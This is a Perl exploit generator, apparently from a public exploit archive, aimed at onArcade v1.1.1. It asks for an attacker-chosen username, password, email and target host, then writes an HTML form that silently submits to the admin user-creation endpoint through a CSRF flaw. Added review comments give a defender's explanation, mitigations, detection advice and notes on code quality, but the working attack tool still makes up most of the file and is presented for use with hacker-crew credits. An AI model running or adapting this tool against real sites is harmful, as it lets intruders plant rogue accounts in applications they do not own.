#!usr/bin/perl
###################################################
# Title : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
# Software : onArcade Game
# Version : 1.1.1
# Date : n/a
# Author : Or4nG.M4n
# visit : or4ng3m4n.blogspot.com
##################################################
# Start Code
#
# Overview: an interactive generator. It prompts for six values on STDIN and
# appends one HTML form to the file named by the first answer. The form POSTs
# to admin/index.php?action=addnewuser on the given host, with hidden
# eusername / euserpassword / euseremail fields and fixed eusergroup=2 and
# euserstatus=1 selections.
#
# Defender's reading: the request built below contains only those five fields
# and a submit button, with no per-session token. Per the title in the header,
# onArcade 1.1.1 accepts this user-creation request on the strength of the
# administrator's session cookie alone, which is the CSRF condition.
# NOTE(review): the meaning of group value 2 and status value 1 is not shown
# here; presumably a privileged group and an active account. Confirm against
# the application's own group and status tables.
#
# Mitigation: require an unpredictable, session-bound anti-CSRF token on every
# state-changing admin action and reject requests without it; check the
# Origin/Referer header on admin POSTs; set the session cookie SameSite;
# ask for the administrator's password again before creating accounts.
#
# Detection: look in web-server logs for POSTs to
# admin/index.php?action=addnewuser whose Referer/Origin is another site or is
# missing, and audit the user table for accounts nobody remembers creating.
#
# NOTE(review): the script as shown has no `use strict` / `use warnings`, and
# every variable below is an undeclared package global.
print q(
+----------------------------------------+
| CSRF CREATE YOUR Exploit By 0r4Ng.M4n |
| visit : Or4ng3M4n.BlogSpot.com |
+----------------------------------------+
);
# Output file name; the generated HTML is appended to this file.
print "save as :";
$safe=<STDIN>;
# User name placed in the hidden 'eusername' field.
print "admin name :";
$ad=<STDIN>;
# Password placed in the hidden 'euserpassword' field.
print "admin pass :";
$ps=<STDIN>;
# E-mail address placed in the hidden 'euseremail' field.
print "admin Email :";
$em=<STDIN>;
# Host name interpolated into the form's action URL.
print "domain :";
$ho=<STDIN>;
# Path of the application under that host (original author's note: just press
# Enter when there is none).
print "path :";
$ph=<STDIN>;
# NOTE(review): two-argument open with the mode and the operator-supplied name
# in a single string. Perl takes mode characters from that string and trims
# surrounding whitespace (which is also why the newline still attached to
# $safe does not end up in the file name). The handle is a bareword global
# and the return value is not checked, so a failed open goes unnoticed.
# The three-argument form with a lexical handle and an error check is the
# safe pattern. '>>' appends: running the script twice with the same name
# stacks two forms in one file.
open(CREATE,">>$safe");
# The answers are interpolated as read: none is chomp'ed or HTML-escaped, so
# each value carries its trailing newline into the markup and a quote
# character in an answer would break the attribute it lands in.
print CREATE "
<HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE>
<form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'>
<input type='hidden' value='$ad' name='eusername' ></td>
<input type='hidden' value='$ps' name='euserpassword' ></td>
<input type='hidden' value='$em' name='euseremail' >
<select name='eusergroup'><option value='2'></option></select></td>
<select name='euserstatus'><option value='1'></option></select></td>
<input type='submit' name='submit' value='add' ></td>";
# close() result is not checked either; buffered write errors would be lost.
close(CREATE);
# Printed unconditionally, whether or not the file was actually written.
print "d0n3\n";
# Credits banner; no functional effect.
print q(
+---------------------------------------------------+
| # -------------[GreEtz & Thnks]------------- # |
| Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr |
| i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 |
| BiG Thnks : sa^dev!L , Lagripe-dz |
+---------------------------------------------------+
| or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs |
);
# End Code